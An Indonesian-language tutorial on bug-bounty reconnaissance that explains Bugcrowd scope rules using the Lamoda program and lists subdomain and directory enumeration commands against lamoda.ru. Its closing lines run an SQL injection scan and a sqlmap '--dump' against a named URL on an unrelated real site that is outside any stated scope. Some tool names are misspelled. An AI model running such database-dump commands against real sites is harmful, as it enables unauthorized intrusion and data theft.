Salah satu website untuk mencari program bug hunting adalah bugcrowd,kalian harus login dulu menjadi member untuk bisa melihat program yang tersedia.
Banyak program yang tersedia di bugcrowd,sebagai contoh saya menggambil program lamoda.
kalian bisa melihat tabel target dan detailnya di sana.sebagai contoh disini lamoda menyediakan scope target sebagai berikut:
In Scope Targets
https://www.lamoda.ru
https://api.lamoda.ru
http://photouploader.lamoda.ru/
Artinya kita hanya bisa mengeksekusi target yang ada di tabel tersebut. Ada juga out scope target,sebagai berikut:
Out-of-Scope
Denial of Service attacks
Use of outdated software/library versions
Use of a known-vulnerable library without a description of an exploit specific to our implementation
Login/logout/unauthenticated/low-impact CSRF
Cookies that lack HTTP Only or Secure settings for non-sensitive data
Self-XSS and issues exploitable only through Self-XSS
Reports from automated tools or scans
Attacks requiring physical access to a user's device or MITM attacks
Username enumeration based on login, forgot password, account creation and registration pages
Enforcement policies for brute force or account lockout
Reports about insecure SSL / TLS configuration
Clickjacking and issues only exploitable through clickjacking
Mail configuration issues including SPF, DKIM, DMARC settings
Rate-limiting issues
Hyperlink injection in emails using forms available to any user
Vulnerabilities affecting users of outdated browsers or platforms
Reports of credentials exposed by other data breaches / known credential lists
Artinya kita tidak di izinkan untuk mengeksekusi itu.
Langsung saja kita coba eksekusi dengan tools sublist3r,sublist3r ini tools yang digunakan untuk mengeksplorasi subdomain yang ada.
apt-get install sublist3r
jalankan perintah berilkut:
sublister -d lamoda.ru
kalau ada error dibiarkan saja dan tunggu sampai hasilnya keluar.
output:
[-] Total Unique Subdomains Found: 104
www.lamoda.ru
abcmedia.lamoda.ru
admin.lamoda.ru
www.admin.lamoda.ru
affiliates.lamoda.ru
affiliates-kz.lamoda.ru
ap.lamoda.ru
api.lamoda.ru
www.api.lamoda.ru
apigw.lamoda.ru
www.apigw.lamoda.ru
apimgmt-dev.lamoda.ru
apimgmt-prod.lamoda.ru
www.apimgmt-prod.lamoda.ru
app.lamoda.ru
....
....
Terlihat kita mendapat total 104 domain,anda bisa simpan ke dalam file txt.
Hasil output tersebut bisa menjadi target kita selanjutnya.
Selain tools sublist3r ada juga beberrapa tools lainnya yang digunakan untuk mencari subdomain.
-sublist3r
#sublister -d lamoda.ru
-knockpy
#./knock.py lamoda.ru
-assetfinder
#./assetfinder -subs-only lamoda.ru
atau
echo "lamoda.ru" | assetfinder -subs-only | tee -a domain.txt
-ammas
#ammas enum -d lamoda.ru
-DirBuster
#dirb https://www.lamoda.ru
-wfuzz
#wfuzz -w /root/tools/pass.txt http://testphp.vulnhub.com/FUZZ
-whatweb
#whatweb https://www.lamoda.ru
-Spiderfoot
#python sf.py
scanning SQL
-scanQli
#pyhon scanqli.py -u 'https://www.asfaa.org/members.php?id=4'
Eksploit SQL
-SQLMap
#sqlmap -u 'https://www.asfaa.org/members.php?id=4'
ekatrak hasil SQL nya
#sqlmap -u 'https://www.asfaa.org/members.php?id=4' --dump